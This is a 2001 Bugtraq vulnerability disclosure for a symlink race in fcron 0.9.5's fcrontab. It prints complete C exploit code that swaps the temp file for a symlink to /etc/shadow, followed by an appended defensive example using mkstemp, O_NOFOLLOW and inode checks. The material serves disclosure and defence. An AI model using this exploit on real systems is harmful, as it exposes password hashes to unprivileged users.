 
Bugtraq mailing list archives
fcron 0.9.5 is vulnerable to a symlink attack
From: kiss from Helisec <NIKEBOY () RETEMAIL ES>
Date: Wed, 28 Feb 2001 21:30:18 +0100
What we need:
         we need root to update our crontab file ( # fcrontab -u kiss -e)
What we get:
         we get /etc/shadow written into our crontab file (or any other file we want)
This is just a proof of concept. What we have to do is run the exploit above
from a normal user shell. Then, in a root console, we update that user's
crontab. After that, just check the contents of <user>.orig and you'll find
/etc/shadow right there :-).
/* --------------------------
   fcrontab exploit by _kiss_
   --------------------------
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <time.h>
#include <dirent.h>
#define TRUE 1
int main(void) {
    struct stat buf;
    time_t modif1,modif2;
    DIR *dir;
    struct dirent *direntry;
    int found=0;
    char string[300];
    char string2[400];
    printf ("---------------------------------------------\n");
    printf ("              fcrontab exploit by _kiss_\n");
    printf (" Helios Security and Administration (HeliSec)\n\n");
    printf (" Greets: Jet-Li (for teaching me some lessons of shell\n");
    printf ("            that i will need someday) :D\n");
    printf ("---------------------------------------------\n");
    /* we wait till /tmp/fcrontab is created */
    printf("\nwaiting for /tmp/fcrontab to be created...\n");
    while(!found) {
        dir=opendir("/tmp");
        if (dir==NULL) continue;
        while ((direntry=readdir(dir))!=NULL) {
            if (strncmp("fcrontab",direntry->d_name,8)==0) {
                /* build the full path now: direntry is no longer valid after closedir() */
                snprintf(string,sizeof(string),"/tmp/%s",direntry->d_name);
                found=1;
                break;
            }
        }
        closedir(dir);
    }
    /* the entry was listed by readdir(); wait until stat() succeeds on it too */
    while (TRUE) {
        if (stat(string,&buf)!=-1)
            break;
    }
    /* we store date of last modification */
    printf("/tmp/fcrontab created. waiting for the update...\n");
    modif1=buf.st_mtime;
    /* we wait till /tmp/fcrontab is updated */
    do {
        stat(string,&buf);
        modif2=buf.st_mtime;
    } while (modif1==modif2);
    /* we make the symlink */
    printf("making a symlink to /etc/shadow...\n");
    snprintf(string2,sizeof(string2),"ln -fs /etc/shadow %s",string);
    system(string2);
    /* we should now have /etc/shadow in /var/spool/fcron/kiss.orig */
    printf("... now check /var/spool/fcron/kiss.orig\n");
    return 0;
}
NOTE: a new version has been released to correct this bug (1.0.1), and it can
be found at fcron.free.fr
                                 _kiss_ from HeliSec
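The defensive counterpart, added here as an example and not part of the post or of fcron's own code: the check a privileged program must make before reading back a file it handed out in /tmp, so that the swap-for-a-symlink race described above is refused instead of followed. It assumes a writable /tmp; the struct, function names and the demo() driver are constructed for this example.

```c
/* Added example, not fcron's code: a privileged editor defeats the race above
 * by trusting the inode it created (taken from the fd), never the path. */
#define _POSIX_C_SOURCE 200809L   /* mkstemp, O_NOFOLLOW, symlink */
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

struct tmp_identity { dev_t dev; ino_t ino; };

/* Create with mkstemp (O_CREAT|O_EXCL, mode 0600) and record the inode we got. */
int create_private_tmp(char *tmpl, struct tmp_identity *id) {
    struct stat st;
    int fd = mkstemp(tmpl);
    if (fd < 0 || fstat(fd, &st) != 0) { if (fd >= 0) close(fd); return -1; }
    id->dev = st.st_dev; id->ino = st.st_ino;
    return fd;
}

/* Read-back open: O_NOFOLLOW makes a symlink fail with ELOOP; fstat on the
 * opened fd then rejects non-regular, hard-linked or replaced files. */
int reopen_checked(const char *path, const struct tmp_identity *id) {
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NOCTTY);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        st.st_dev != id->dev || st.st_ino != id->ino) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed driver: swap=0 leaves the file alone (read-back accepted, 0);
 * swap=1 swaps the path for a symlink between write and read-back (rejected, 1). */
int demo(int swap) {
    char path[] = "/tmp/fcrontab.XXXXXX";     /* mkstemp fills in the Xs */
    struct tmp_identity id;
    int fd = create_private_tmp(path, &id);
    if (fd < 0) return -1;                   /* setup error, e.g. /tmp read-only */
    close(fd);
    if (swap) {
        unlink(path);                        /* the race: path now points elsewhere */
        if (symlink("/nonexistent-target", path) != 0) return -1;
    }
    int r = reopen_checked(path, &id);
    if (r >= 0) close(r);
    unlink(path);
    return r >= 0 ? 0 : 1;
}
```

The dev/ino comparison is what matters: it also catches an attacker who unlinks the file and drops a fresh regular file at the same path, which a symlink-only check would miss.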